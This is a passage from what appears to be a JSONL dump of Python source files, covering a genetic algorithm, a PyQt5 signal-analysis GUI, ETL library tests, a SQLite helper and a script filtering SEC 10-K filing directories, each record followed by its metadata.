== b:\n fit += 1\n for c, d in zip(self.board[x][1], individual[1]):\n if c == d:\n fit += 1\n except IndexError:\n return fit\n return fit\n\n def crossover(self, parent1, parent2, crossover_prob):\n '''\n Order crossover (with 2 cuts)\n Place the sequence from parent1 between the cuts in position\n Complete the new individual until the end with the rest of\n parent 2\n Complete the rest of the new individual with the numbers that\n are not already existing in the new individual\n :param parent1: individual to make the crossover\n :param parent2: individual to make the crossover\n :return: the new individual\n '''\n\n random.seed(int(datetime.now().strftime('%M:%S.%f')[-3:]))\n if crossover_prob > random.random():\n\n\n pos1 = random.randint(0, len(parent1[0]))\n pos2 = random.randint(pos1, len(parent1[0]))\n\n if pos1 == pos2:\n return parent2\n else:\n new_born1 = self.result_crossover(parent1[0], parent2[0], pos1, pos2)\n new_born2 = self.result_crossover(parent1[1], parent2[1], pos1, pos2)\n return [new_born1, new_born2]\n\n else:\n return parent1\n\n def result_crossover(self, parent1, parent2, pos1, pos2):\n '''\n Crossover on one half of the given parents\n :param parent1:\n :param parent2:\n :param pos1:\n :param pos2:\n :return:\n '''\n subs1 = parent1[pos1:pos2]\n subs2 = parent2[pos1:pos2]\n end = parent2[pos2:]\n start = parent2[:pos1]\n aux = []\n\n for x in subs2:\n if x not in subs1:\n aux.append(x)\n\n subs2 = aux\n\n for y in end:\n if y in subs1:\n end[end.index(y)] = subs2.pop(0)\n\n for z in start:\n if z in subs1 and z not in end:\n start[start.index(z)] = subs2.pop(0)\n\n new_born = start + subs1 + end\n\n return new_born\n\n def mutate(self, individual, mutation_prob):\n '''\n Perform a mutation on the given individual\n :param individual: the individual to mutate\n :return: the new individual\n '''\n random.seed(int(datetime.now().strftime('%M:%S.%f')[-3:]))\n\n if 
mutation_prob > random.random():\n random.shuffle(individual[0])\n random.shuffle(individual[1])\n return individual\n\n\n # def __str__(self):\n # s = ''\n # for line in self.board:\n # for element in line:\n # s = s + str(element) + ' '\n # s = s + '\\n'\n # return s\n\n","sub_path":"2nd Year/AI/Lab3/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"61814254","text":"# -*- coding: utf-8 -*-\n\n# PyQt5: pyuic5 -o View.py View.ui\n\n''' ***** 自定义包,类 ***** '''\nfrom View import *\nfrom Util.Message import Message\nfrom Model.Seg import SegFile,DataTtrack\nfrom MyController.MyFigureCanvas import *\nfrom MyController import Algorithm_CWT\n\n''' ==================== ↓ 控制 ↓ ==================== '''\nclass Controller(QtWidgets.QMainWindow):\n def __init__(self):\n super(Controller, self).__init__() # 先调用父类的构造函数\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.initUi() # 界面初始设置\n self.connect() # 绑定信号槽\n self.addPainteWidget() #添加绘图控件\n \n self.stateDiagram = 0 #程序状态控制 —— 用于切换不同界面控制:0.初始状态、1.已加载文件、2.已完成FFT、3.已完成CWT、4、已完成LSTM\n\n def initUi(self): # 界面初始设置\n self.setWindowState(QtCore.Qt.WindowMaximized)\n self.toolButton_Home_clicked()\n\n ''' ↓ 添加绘图控件 ↓ '''\n def addPainteWidget(self):\n\n self.paintFFT = MyFigureCanvasFFT(1)\n self.ui.gridLayout_Canvas_FFT.addWidget(self.paintFFT)\n \n self.paintCWT = MyFigureCanvasCWT(2)\n self.ui.gridLayout_Canvas_CWT_Paint.addWidget(self.paintCWT)\n\n self.paintLSTM = MyFigureCanvasLSTM(3)\n self.ui.gridLayout_Canvas_LSTM.addWidget(self.paintLSTM)\n\n \n def connect(self): # 绑定信号槽\n # 绑定导航栏按钮\n self.ui.toolButton_Home.clicked.connect(self.toolButton_Home_clicked)\n self.ui.toolButton_FFT.clicked.connect(self.toolButton_FFT_clicked)\n self.ui.toolButton_CWT.clicked.connect(self.toolButton_CWT_clicked)\n self.ui.toolButton_LSTM.clicked.connect(self.toolButton_LSTM_clicked)\n self.ui.toolButton_Set.clicked.connect(self.toolButton_Set_clicked)\n\n # 绑定meanBar\n self.ui.opeanFile.triggered.connect(self.menu_opeanFile)\n\n ''' -------------------- ↓ 菜单栏事件 ↓ -------------------- '''\n\n def menu_opeanFile(self):\n fileName, filetype = QtWidgets.QFileDialog.getOpenFileName(\n self, \"选取文件\", \"C:/\", \"seg Files (*.seg)\") # 设置文件扩展名过滤,注意用双分号间隔\n\n if fileName == '' :\n QtWidgets.QMessageBox.warning(\n self, \"Warning\", Message().dict['Error(1002)'], QtWidgets.QMessageBox.Yes)\n else:\n self.segFile = SegFile()\n \n reply = self.segFile.loadFile(fileName)\n if(reply != 0):\n QtWidgets.QMessageBox.warning(\n self, \"Warning\", Message().dict[reply], QtWidgets.QMessageBox.Yes)\n else:\n self.stateDiagram = 1 # 1-已加载文件\n \n self.paintCWT.figureClear()\n for i in range(0,self.segFile.tapeNum):\n self.paintFFT.setAx(i,self.segFile.tapeNum,'2d')\n self.paintFFT.paint(i,self.segFile.dataList[i].data)\n \n # cwtmatr,freqs = Algorithm.MyPywtCWT( self.segFile.dataList[ self.segFile.TapeNumCurrent ].data )\n # cwtmatr = Algorithm_CWT.MyScipyCwt(self.segFile.dataList[ self.segFile.TapeNumCurrent ].data, 128)\n cwtmatr = Algorithm_CWT.MyWavelets(self.segFile.dataList[ self.segFile.TapeNumCurrent ].data, 128)\n \n self.paintCWT.figureClear()\n\n # self.paintCWT.setAx(0,2) # 第 1 行, 共 2 行\n # self.paintCWT.MyMatshow(0,cwtmatr)\n\n self.paintCWT.setAx(0,1,'3d') # 第 2 行, 共 2 行\n self.paintCWT.MyPlot_surface(0, cwtmatr, 1, 2) # 第几行、数据、绘图采样步长:频率、绘图采样步长:时间\n self.paintCWT.My3DView_init(0,45,180)\n \n\n \n # 导航栏更新\n\n def 
toolButton_NavigationBar_Update(self, i):\n # 设置导航栏颜色\n p = QtGui.QPalette() # 调色板\n p.setColor(QtGui.QPalette.Button, QtGui.QColor(44, 44, 44)) # 灰黑色\n\n self.ui.toolButton_Home.setPalette(p)\n self.ui.toolButton_FFT.setPalette(p)\n self.ui.toolButton_CWT.setPalette(p)\n self.ui.toolButton_LSTM.setPalette(p)\n self.ui.toolButton_Set.setPalette(p)\n\n p.setColor(QtGui.QPalette.Button, QtGui.QColor(128, 128, 128)) # 灰色\n if i == 0:\n self.ui.toolButton_Home.setPalette(p)\n if i == 1:\n self.ui.toolButton_FFT.setPalette(p)\n if i == 2:\n self.ui.toolButton_CWT.setPalette(p)\n if i == 3:\n self.ui.toolButton_LSTM.setPalette(p)\n if i == 4:\n self.ui.toolButton_Set.setPalette(p)\n\n self.ui.stackedWidget_Panel.setCurrentIndex(i)\n self.ui.stackedWidget_Canvs.setCurrentIndex(i)\n\n def toolButton_Home_clicked(self):\n self.toolButton_NavigationBar_Update(0)\n\n def toolButton_FFT_clicked(self):\n if self.stateDiagram >=1: # 1-已加载文件\n self.toolButton_NavigationBar_Update(1)\n self.stateDiagram = 2\n else:\n QtWidgets.QMessageBox.warning(\n self, \"Warning\", Message().dict['Warning(1001)'], QtWidgets.QMessageBox.Yes)\n \n def toolButton_CWT_clicked(self):\n if self.stateDiagram >=2: # 2-已完成FFT\n self.toolButton_NavigationBar_Update(2)\n else:\n QtWidgets.QMessageBox.warning(\n self, \"Warning\", Message().dict['Warning(1002)'], QtWidgets.QMessageBox.Yes)\n \n def toolButton_LSTM_clicked(self):\n if self.stateDiagram >=3: # 3-已完成CWT\n self.toolButton_NavigationBar_Update(3)\n else:\n QtWidgets.QMessageBox.warning(\n self, \"Warning\", Message().dict['Warning(1003)'], QtWidgets.QMessageBox.Yes)\n \n def toolButton_Set_clicked(self):\n if self.stateDiagram >=1: # 1-已加载文件\n self.toolButton_NavigationBar_Update(4)\n else:\n QtWidgets.QMessageBox.warning(\n self, \"Warning\", Message().dict['Warning(1001)'], QtWidgets.QMessageBox.Yes)\n \n\n\n\n","sub_path":"v0.5.5-test/MyController/Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"565011029","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /users/payno/.local/share/virtualenvs/tomwer_venc/lib/python3.7/site-packages/tomwer/core/process/timer.py\n# Compiled at: 2020-03-06 02:01:31\n# Size of source mod 2**32: 2556 bytes\n__authors__ = [\n 'H. 
Payno']\n__license__ = 'MIT'\n__date__ = '12/12/2018'\nfrom tomwer.core.process.baseprocess import SingleProcess, _input_desc, _output_desc\nfrom tomwer.core.scan.scanbase import TomoBase\nfrom tomwer.core.scan.scanfactory import ScanFactory\nimport time\nfrom tomwer.core.log import TomwerLogger\n_logger = TomwerLogger(__name__)\n\nclass Timer(SingleProcess):\n __doc__ = '\\n Simple timer / time out - function'\n inputs = [\n _input_desc(name='data', type=TomoBase, handler='process', doc='scan object')]\n outputs = [\n _output_desc(name='data', type=TomoBase, doc='scan object')]\n\n def __init__(self, wait):\n SingleProcess.__init__(self)\n self.waiting_time = wait or 1\n\n @property\n def waiting_time(self):\n return self._waiting_time\n\n @waiting_time.setter\n def waiting_time(self, wait):\n self._waiting_time = wait\n\n def process(self, scan):\n if type(scan) is dict:\n _scan = ScanFactory.create_scan_object_frm_dict(scan)\n else:\n _scan = scan\n assert isinstance(scan, TomoBase)\n time.sleep(self.waiting_time)\n if self._return_dict:\n return _scan.to_dict()\n return _scan","sub_path":"pycfiles/tomwer-0.4.0.linux-x86_64.tar/timer.cpython-37.py","file_name":"timer.cpython-37.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"227708762","text":"#Exponentation-Part A\r\n\r\n'''\r\nWrite a program to find the exponentation of given number\r\n\r\nInput 1: Number of terms \r\nInput 2: Base\r\n\r\nOutput:\r\nList of exponentation terms for the given input\r\n\r\nRefer sample input and output for formatting specification.\r\n'''\r\n\r\nn= int(input())\r\nb= int(input())\r\np = 0\r\nprint(\"The total terms is:\",n)\r\nfor i in range(0, n):\r\n p=pow(b,i)\r\n print(p)\r\r\n","sub_path":"Python/Exponentation-Part A.py","file_name":"Exponentation-Part A.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"541378563","text":"import pytest\nimport pandas as pd\nfrom pandas.testing import assert_frame_equal\nimport pypel\nimport os\nimport datetime as dt\nimport numpy\nfrom tests.unit.test_Loader import LoaderTest\n\n\nclass TransformerForTesting(pypel.transformers.Transformer):\n def _format_na(self, df: pd.DataFrame) -> pd.DataFrame:\n return df.where(df.notnull(), 0).astype(int)\n\n\n@pytest.fixture\ndef ep():\n return pypel.processes.Process(extractor=pypel.extractors.Extractor())\n\n\ndef mockreturn_extract(self, dummy):\n d = {\n \"PRoJET\": [\"nom du projet\"],\n \"ENTREPrISE\": [\"MINISTERE DE L'ECONOMIE DES FINANCES ET DE LA RELANCE\"],\n \"TYPE ENTREPRISE\": [\"PME\"],\n \"SIRéN\": [110020013],\n \"SIRéT\": [11002001300097],\n \"DéPARTEMENT\": [\"75\"],\n \"VILlE\": [\"Paris\"],\n \"MONTANT INVESTISSEMENT\": [10000],\n \"DESCRIPTION_PROJET\": [\"belle description de ce projet\"],\n \"RETOMBéES PROJET\": [\"belle retombées du projet\"],\n \"DATE_DEPOT_PROJET\": [dt.datetime.strptime(\"2019/05/12\", \"%Y/%m/%d\")],\n \"DATE_DEBUT_INSTRUCTION\": [dt.datetime.strptime(\"2019/05/12\", \"%Y/%m/%d\")],\n \"MONTANT_PARTICIPATION_ETAT\": [5000],\n \"DATE_DECISION\": [dt.datetime.strptime(\"2019/05/12\", \"%Y/%m/%d\")],\n \"CODE_COMMUNE_ETABLISSEMENT\": ['75112'],\n \"STATUT\": [\"decidé\"]\n }\n df = pd.DataFrame(d)\n return df\n\n\ndef mockreturn_extract_no_date(self):\n test = {\n \"Projet\": [\"nom du projet\"],\n \"ENtReprISE\": [\"MINISTERE DE L'ECONOMIE DES FINANCES ET DE LA RELANCE\"],\n \"TYPE 
eNTReprISE\": [\"PME\"],\n \"SIreN\": [110020013],\n \"SIREt\": [11002001300097],\n \"Département\": [\" 75 \"],\n \"Ville\": [\"Paris\"],\n \"MonTANT INVESTISSEMENT\": [10000],\n \"DESCRIPTION pROJET\": [\"belle description de ce projet\"],\n \"RETOMBEES PROJET\": [\"belle retombées du projet\"],\n \"MONTANT PARTICIPATION éTAT\": [5000],\n \"CODE_COMMUNE_ETABLISSEMENT\": ['75112'],\n \"Statut\": [\"decidé\"],\n \"ShouldBeNone\": numpy.NaN\n }\n test_df = pd.DataFrame(test)\n return test_df\n\n\ndef test_integration_extract_transform_no_date(ep, params, monkeypatch):\n monkeypatch.setattr(pypel.processes.Process, \"extract\", mockreturn_extract_no_date)\n expected = {\n \"PROJET\": [\"nom du projet\"],\n \"ENTREPRISE\": [\"MINISTERE DE L'ECONOMIE DES FINANCES ET DE LA RELANCE\"],\n \"TYPE_ENTREPRISE\": [\"PME\"],\n \"SIREN\": [110020013],\n \"SIRET\": [11002001300097],\n \"DEPARTEMENT\": [\"75\"],\n \"VILLE\": [\"Paris\"],\n \"MONTANT_INVESTISSEMENT\": [10000],\n \"DESCRIPTION_PROJET\": [\"belle description de ce projet\"],\n \"RETOMBEES_PROJET\": [\"belle retombées du projet\"],\n \"MONTANT_PARTICIPATION_ETAT\": [5000],\n \"CODE_COMMUNE_ETABLISSEMENT\": ['75112'],\n \"STATUT\": [\"decidé\"],\n \"SHOULDBENONE\": None\n }\n df = ep.extract()\n with pytest.warns(UserWarning):\n obtained = ep.transform(df,\n column_replace={\"é\": \"e\", \" \": \"_\"},\n strip=[\"DEPARTEMENT\"])\n expected_df = pd.DataFrame(expected)\n assert_frame_equal(expected_df, obtained, check_names=True)\n\n\ndef test_integration_exctract_transform(ep, params, monkeypatch):\n monkeypatch.setattr(pypel.processes.Process, \"extract\", mockreturn_extract)\n expected = {\n \"PROJET\": [\"nom du projet\"],\n \"ENTREPRISE\": [\"MINISTERE DE L'ECONOMIE DES FINANCES ET DE LA RELANCE\"],\n \"TYPE_ENTREPRISE\": [\"PME\"],\n \"SIREN\": [110020013],\n \"SIRET\": [11002001300097],\n \"DEPARTEMENT\": [\"75\"],\n \"VILLE\": [\"Paris\"],\n \"MONTANT_INVESTISSEMENT\": [10000],\n \"DESCRIPTION_PROJET\": [\"belle description de ce projet\"],\n \"RETOMBEES_PROJET\": [\"belle retombées du projet\"],\n \"DATE_DEPOT_PROJET\": [\"2019-05-12\"],\n \"DATE_DEBUT_INSTRUCTION\": [\"2019-05-12\"],\n \"MONTANT_PARTICIPATION_ETAT\": [5000],\n \"DATE_DECISION\": [\"2019-05-12\"],\n \"CODE_COMMUNE_ETABLISSEMENT\": ['75112'],\n \"STATUT\": [\"decidé\"]\n }\n df = ep.extract(\"\")\n obtained = ep.transform(df,\n column_replace={\"é\": \"e\", \" \": \"_\"},\n date_format=\"%Y-%m-%d\",\n date_columns=[\"DATE_DEPOT_PROJET\", \"DATE_DEBUT_INSTRUCTION\", \"DATE_DECISION\"])\n expected_df = pd.DataFrame(expected)\n assert_frame_equal(expected_df, obtained, check_names=True)\n\n\ndef test_init_dataframe_excel(ep, params, monkeypatch):\n path = os.path.join(os.getcwd(), \"tests\", \"fake_data\", \"test_init_df.xlsx\")\n expected_default = pd.DataFrame(data=[[1, 1, 1, 1, 1],\n [2, 2, 2, 2, 2],\n [3, 3, 3, 3, 3],\n [4, 4, 4, 4, 4],\n [5, 5, 5, 5, 5],\n [6, 6, 6, 6, 6],\n [7, 7, 7, 7, 7],\n [8, 8, 8, 8, 8],\n [9, 9, 9, 9, 9]], columns=[\"A\", \"B\", \"C\", \"D\", \"E\"])\n df = ep.extract(path)\n with pytest.warns(UserWarning):\n obtained_default = ep.transform(df)\n assert_frame_equal(expected_default, obtained_default)\n\n\ndef test_init_dataframe_excel_skiprows(ep, params, monkeypatch):\n path = os.path.join(os.getcwd(), \"tests\", \"fake_data\", \"test_init_df.xlsx\")\n expected_skip_5 = pd.DataFrame(data=[[6, 6, 6, 6, 6],\n [7, 7, 7, 7, 7],\n [8, 8, 8, 8, 8],\n [9, 9, 9, 9, 9]],\n columns=[\"0\", \"1\", \"2\", \"3\", \"4\"])\n df = ep.extract(path, skiprows=5, 
header=None)\n with pytest.warns(UserWarning):\n obtained_skip_5 = ep.transform(df)\n assert_frame_equal(expected_skip_5, obtained_skip_5)\n\n\ndef test_init_dataframe_excel_sheetname(ep, params, monkeypatch):\n path = os.path.join(os.getcwd(), \"tests\", \"fake_data\", \"test_init_df.xlsx\")\n expected_sheetname = pd.DataFrame(data=[[9]], columns=[\"A\"])\n df = ep.extract(path, sheet_name=\"TEST\")\n with pytest.warns(UserWarning):\n obtained_sheetname = ep.transform(df)\n assert_frame_equal(expected_sheetname, obtained_sheetname)\n\n\ndef test_init_dataframe_excel_csv(ep, params, monkeypatch):\n path_csv = os.path.join(os.getcwd(), \"tests\", \"fake_data\", \"test_init_df.csv\")\n expected_csv = pd.DataFrame(data=[[1, 1, 1, 1, 1],\n [2, 2, 2, 2, 2],\n [3, 3, 3, 3, 3],\n [4, 4, 4, 4, 4],\n [5, 5, 5, 5, 5],\n [6, 6, 6, 6, 6],\n [7, 7, 7, 7, 7],\n [8, 8, 8, 8, 8],\n [9, 9, 9, 9, 9]], columns=[\"A\", \"B\", \"C\", \"D\", \"E\"])\n df = ep.extract(path_csv)\n with pytest.warns(UserWarning):\n obtained_csv = ep.transform(df)\n assert_frame_equal(expected_csv, obtained_csv)\n\n\ndef test_init_bad_filename(ep, params, monkeypatch):\n path = os.path.join(os.getcwd(), \"tests\", \"fake_data\", \"test_bad_filename$.csv\")\n expected_badfilename = pd.DataFrame(data=[[1, 1, 1, 1, 1],\n [2, 2, 2, 2, 2],\n [3, 3, 3, 3, 3],\n [4, 4, 4, 4, 4],\n [5, 5, 5, 5, 5],\n [6, 6, 6, 6, 6],\n [7, 7, 7, 7, 7],\n [8, 8, 8, 8, 8],\n [9, 9, 9, 9, 9]], columns=[\"A\", \"B\", \"C\", \"D\", \"E\"])\n df = ep.extract(path)\n with pytest.warns(UserWarning):\n obtained_bad_filename = ep.transform(df)\n assert_frame_equal(expected_badfilename, obtained_bad_filename)\n\n\ndef test_init_bad_filename_excel(ep, params, monkeypatch):\n path = os.path.join(os.getcwd(), \"tests\", \"fake_data\", \"test_bad_filename$.xlsx\")\n expected_badfilename = pd.DataFrame(data=[[1, 1, 1, 1, 1],\n [2, 2, 2, 2, 2],\n [3, 3, 3, 3, 3],\n [4, 4, 4, 4, 4],\n [5, 5, 5, 5, 5],\n [6, 6, 6, 6, 6],\n [7, 7, 7, 7, 7],\n [8, 8, 8, 8, 8],\n [9, 9, 9, 9, 9]], columns=[\"A\", \"B\", \"C\", \"D\", \"E\"])\n with pytest.warns(UserWarning):\n df = ep.extract(path)\n with pytest.warns(UserWarning):\n obtained_bad_filename = ep.transform(df)\n assert_frame_equal(expected_badfilename, obtained_bad_filename)\n\n\ndef test_multiple_transformers(ep):\n testing_df = pd.DataFrame({\"0\": [numpy.NaN]})\n expected_df = pd.DataFrame({\"0\": [0]})\n with pytest.warns(UserWarning):\n obtained_df = pypel.processes.Process(\n transformer=[pypel.transformers.Transformer(), TransformerForTesting()]).transform(testing_df)\n assert_frame_equal(expected_df, obtained_df, check_names=True)\n\n\ndef test_process_method(es_conf, es_indice):\n path_csv = os.path.join(os.getcwd(), \"tests\", \"fake_data\", \"test_init_df.csv\")\n process = pypel.processes.Process(loader=LoaderTest(es_conf, es_indice))\n with pytest.warns(UserWarning):\n process.process(path_csv)\n","sub_path":"tests/integration/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":9769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"570525555","text":"import time\nimport traceback\n\nclass LogLevel:\n Info = 'Info'\n Warning = 'Warning'\n Error = 'Error'\n Debug = 'Debug'\n\ndef writeException(customMessage, exception):\n print(customMessage, str(exception))\n\ndef write(message, logLevel=LogLevel.Info):\n msgFormat = time.strftime(\"%d/%m/%y\") + \" \" + time.strftime(\"%H:%M:%S\") + \" \"\n if logLevel == LogLevel.Info:\n 
msgFormat += \"{0}\"\n elif logLevel == LogLevel.Warning:\n msgFormat += \"WARNING: {0}\"\n elif logLevel == LogLevel.Error:\n msgFormat += \"\\n------------------------------------------------------------------------------------\"\n msgFormat += \"\\n ERROR: {0}\"\n msgFormat += \"\\n------------------------------------------------------------------------------------\"\n elif logLevel == LogLevel.Debug:\n msgFormat += \"DEBUG: {0}\"\n\n print(msgFormat.format(message));","sub_path":"Python/ComandoServer/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"264990199","text":"import sqlite3,os,re,time\nfrom itertools import compress\nimport numpy as np\n\nclass DatabaseMaster:\n\n def __init__(self,db_path):\n \"\"\"\n Initialize database master\n\n :param db_path: path of the sqlite database file\n :return:\n None\n \"\"\"\n self.conn = sqlite3.connect(db_path)\n\n def merge(self,into_table,from_table,merge_cols,order):\n \"\"\"\n Merges any table into the output table\n\n Suggestion:\n When providing order, please, use `run_idx` for the argument table, and `out_idx` for the output table.\n Also, it the `arg_table` it is a good idea to select `run_idx ==1`\n\n Example:\n
\n        merge('out_000_dock','arg_000_reorder',['reorder_outpath'],[[1,4,2,3],[1,2,3,4]])\n        
\n\n :param into_table: string (table to merge into)\n :param from_table: string (table to merge from)\n :param merge_cols: list of strings (names of the columns in merge_from to merge)\n :param order: Two lists of the same length. into_table_idx <-- from_table_idx \\\n First list: idx of the `into_table`, second list: idx of the `from table` to merge.\n :return: \n None\n \"\"\"\n\n assert len(order)==2, \"order should contain 2 lists [[idx_to_update(into_table)],[idx_of_updates(from_table)]]\"\n cursor = self.conn.cursor()\n num_cols = len(merge_cols)\n\n # find the data types of the columns to transfer\n sql_cmd = \"pragma table_info(\\\"{}\\\")\".format(from_table)\n cursor.execute(\"{}\".format(sql_cmd))\n\n arg_infos = cursor.fetchall()\n arg_dict = {}\n [arg_dict.update({arg_info[1]:arg_info[2]}) for arg_info in arg_infos]\n col_types = [arg_dict[col_name] for col_name in merge_cols]\n\n # initialize the columns in the table where cols will be added\n sql_tmp = \"alter table \\\"{}\\\" add column \".format(into_table)\n for i in range(num_cols):\n sql_cmd = sql_tmp + \", \".join([\" \".join([merge_cols[i],col_types[i]])]) + \";\"\n cursor.execute(sql_cmd)\n self.conn.commit()\n\n # fetch values to transfer\n sql_cmd = \"select \" + \", \".join(merge_cols) + \" from \\\"{}\\\"\".format(from_table)\n cursor.execute(sql_cmd)\n transfer_vals = cursor.fetchall()\n\n # gather the transfer values from the downstream table with order\n transfer_vals = map(lambda i: transfer_vals[order[1][i]] + (order[0][i],), order[0])\n\n # insert columns into the upstream table\n sql_tmp = \"update \\\"{}\\\" set \".format(into_table)\n sql_tmp += \", \".join([merge_cols[i]+ \"=?\" for i in range(num_cols)])\n sql_tmp += \" where out_idx=?;\"\n self.conn.executemany(sql_tmp,transfer_vals)\n self.conn.commit()\n\n def list_search(self, search_with, search_in):\n \"\"\" Search with each element of the `search_with` in the list `search_in`.\n Then get three lists:\n - hits_idx:\n A list of length len(search_with) of lists. Internal list is indexes [j1,j2,j3,j4] such that values \\\n search_with[i] == search_in[j1], search_with[i] == search_in[j2], ...\n - hits_val:\n Same as hits_idx but lists with values instead of indexes\n - pairs_idx:\n Two lists of the same length. search_with[pairs_idx[0][i]] == search_in[pairs_idx[1][i]]\n\n Example:\n
\n        list_search(['3AT1','2TPI'],['2TPI','3EML','3AT1','2TPI'])\n        
\n\n        Output:\n        
\n        [[2],[0,3]],\n        [['3AT1'],['2TPI','2TPI']],\n        [[0,1,1],[2,0,3]]\n        
\n\n :param search_with: list of [str/float/int]\n :param search_in: list of [str/float/int]\n :return:\n three lists: hits_idx, hits_val, pairs_idx\n \"\"\"\n sw = np.asarray(search_with)\n si = np.asarray(search_in)\n\n # sort search_in, count every element\n order_si = np.argsort(si)\n sorted_si = si[order_si]\n unique_si, counts_si = np.unique(sorted_si, return_counts=True)\n\n # search sorted\n hits_unq_idx = np.searchsorted(unique_si, sw)\n hits_mask = np.in1d(sw, unique_si)\n\n # loop through every query and add all of its examples to the answer list\n hits_idx = []\n hits_val = []\n pair_idx = [[], []]\n\n for i in range(len(sw)):\n if not hits_mask[i]:\n hits_idx.append([])\n hits_val.append([])\n else:\n # one matches many form of output\n hit_idx = [order_si[j + hits_unq_idx[i]] for j in range(counts_si[hits_unq_idx[i]])]\n hits_idx.append(hit_idx)\n q_hit_val = list(si[hit_idx])\n hits_val.append(q_hit_val)\n # one matches one form of output\n [[pair_idx[0].append(i), pair_idx[1].append(idx)] for idx in hit_idx]\n return hits_idx, hits_val, pair_idx\n\n\n def retrieve(self, table, cols, col_rules):\n \"\"\" Retrieves column values from a single table based on a given filtering rule.\n\n Example:\n
\n        my_db.retrieve(some_table_table,[\"num1\",\"num2\"],{\"remainder_div_3\":\"{}==1 or {}==2\", \"sum\":\"{}<200\"})\n        
\n        will retrieve:\n        
\n        columns called \"num1\" and \"num2\" from some table, keeping only rows whose remainder_div_3 column\n        equals 1 or 2 and whose \"sum\" column is less than 200. All column rules are combined with an \"AND\" statement.\n        
\n \n :param table: string (name of the table to retrieve from)\n :param columns: list of strings (names of the columns to retrieve)\n :param column_rules: dictionary of rules that will be evaluated\n :return: \n Nested list in which is entry in a list a a column with filtered requested values\n \"\"\"\n # todo: add string comp support\n cursor = self.conn.cursor()\n\n # from the table get all the columns to retrieve\n sql_cmd = \"select \" + \" ,\".join(cols) + \" from \\\"\" + table + \"\\\"\"\n cursor.execute(sql_cmd)\n sel_sets = cursor.fetchall()\n\n if len(col_rules)==0:\n sel_vals = sel_sets\n else:\n # from the table select all the columns to filter for\n sql_cmd = \"select \" + \", \".join([key for key in col_rules]) + \" from \\\"\" + table + \"\\\"\"\n cursor.execute(sql_cmd)\n filter_sets = cursor.fetchall()\n\n # repeat every argument number of times it appears in the selection\n mult = [len(re.findall(\"{}\", col_rules[key])) for key in col_rules]\n\n def _repeat_vals(vals, repeats):\n rep_vals = []\n [[rep_vals.append(vals[i]) for _ in range(repeats[i])] for i in range(len(col_rules))]\n return rep_vals\n filter_sets = [_repeat_vals(set, mult) for set in filter_sets]\n\n # evaluate every row to get a boolean mask of examples\n rule_tmp = \"(\" + \") and (\".join([col_rules[key] for key in col_rules]) + \")\"\n sel_mask = [eval(rule_tmp.format(*val_set)) for val_set in filter_sets]\n\n # apply a boolean mask to take only entries that fit the selection rule\n sel_sets = list(compress(sel_sets, sel_mask))\n sel_vals = [list(x) for x in zip(*sel_sets)]\n return sel_vals\n","sub_path":"affinityDB/database/master_ops.py","file_name":"master_ops.py","file_ext":"py","file_size_in_byte":7431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"342568","text":"import os\nimport json\nimport glob\nfrom decouple import config\nfrom datetime import datetime\n\ndef all_data():\n data_dir_location = config('DATA_DIR')\n filenames = list(glob.iglob(os.path.join(\n data_dir_location,\n '0*',\n '10-k',\n '*')))\n\n fns = dict()\n prefix_len = len(data_dir_location) + 1 # +1 removes '/' after prefix\n for fn in filenames:\n dir_name = '/'.join(fn.split('/')[:-2])\n key, value = (fn[prefix_len:].split('/')[0],\n (dir_name,\n int(fn[prefix_len:].split('/')[-1][:4])))\n if key in fns:\n fns[key][1].append(value[1])\n else:\n fns[key] = (dir_name, [value[1]])\n return fns\n\n\ndef split_company_dataset(fns):\n current_year = datetime.now().year\n num_incomplete = 0; incomplete_data = []\n num_young = 0; young_companies = []\n num_out_of_business = 0; out_of_business_companies = []\n num_useable = 0; useable_data = []\n\n for key, v in fns.items():\n if v[1] is None:\n continue\n value = v[1]\n min_year, max_year = min(value), max(value)\n expected_years = range(min_year, max_year)\n all_years_present = all([year in value\n for year in expected_years])\n\n if all_years_present == False:\n incomplete_data.append(v[0])\n num_incomplete += 1\n fns[key] = (v[0], None)\n elif max_year - min_year < 10:\n if (current_year - max_year) < 2: # Since all companies must file 10-k,\n # any who have not are out of business.\n young_companies.append(v[0])\n num_young += 1\n fns[key] = (v[0], None)\n else:\n out_of_business_companies.append(v[0])\n num_out_of_business += 1\n fns[key] = (v[0], None)\n else:\n useable_data.append(v[0])\n num_useable += 1\n\n result = {'num_incomplete': num_incomplete,\n 'incomplete_data': incomplete_data,\n 'num_young': 
num_young,\n 'young_companies': young_companies,\n 'num_out_of_business': num_out_of_business,\n 'out_of_business_companies': out_of_business_companies,\n 'num_useable': num_useable,\n 'useable_data': useable_data,\n 'all_data': fns}\n return result\n\ndef remove_marked_companies(fns):\n useable_data = []\n for key, v in fns.items():\n if v[1] is None:\n continue\n useable_data.append(v[0])\n return useable_data\n\n\ndef save_output(fns, data_split):\n filename = os.path.join(config('DATA_DIR'), 'filtered_filenames')\n with open(filename, 'w') as f:\n f.write('\\n'.join(fns))\n\n filename = os.path.join(config('DATA_DIR'), 'all_data')\n with open(filename, 'w') as f:\n json.dump(data_split, f, indent=4)\n\n\ndef filter_data():\n filenames = all_data()\n data_split = split_company_dataset(filenames)\n filenames = remove_marked_companies(data_split['all_data'])\n save_output(filenames, data_split)\n\n\nif __name__ == '__main__':\n 